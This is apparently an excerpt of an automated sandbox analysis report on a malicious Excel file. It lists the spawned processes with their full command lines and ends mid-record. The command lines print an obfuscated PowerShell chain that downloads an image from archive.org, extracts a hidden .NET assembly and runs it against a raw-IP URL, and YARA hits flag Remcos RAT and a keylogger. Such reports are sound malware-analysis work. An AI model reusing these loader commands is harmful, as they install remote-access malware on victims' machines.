                                                      2024-08-28 04:57:01 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z



                                                      Target ID:0
                                                      Start time:00:56:05
                                                      Start date:28/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13f830000
                                                      File size:28'253'536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:00:56:27
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                      Imagebase:0x13f7e0000
                                                      File size:13'824 bytes
                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:00:56:30
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                                                      Imagebase:0x4a7d0000
                                                      File size:345'088 bytes
                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:00:56:30
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:00:56:34
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                                                      Imagebase:0x13ffb0000
                                                      File size:2'758'280 bytes
                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:00:56:34
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
                                                      Imagebase:0x13fe50000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:00:56:38
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                                                      Imagebase:0xfff90000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:00:56:39
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? 
?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? 
?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? 
? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? 
?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:00:56:39
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:00:56:44
                                                      Start date:28/08/2024
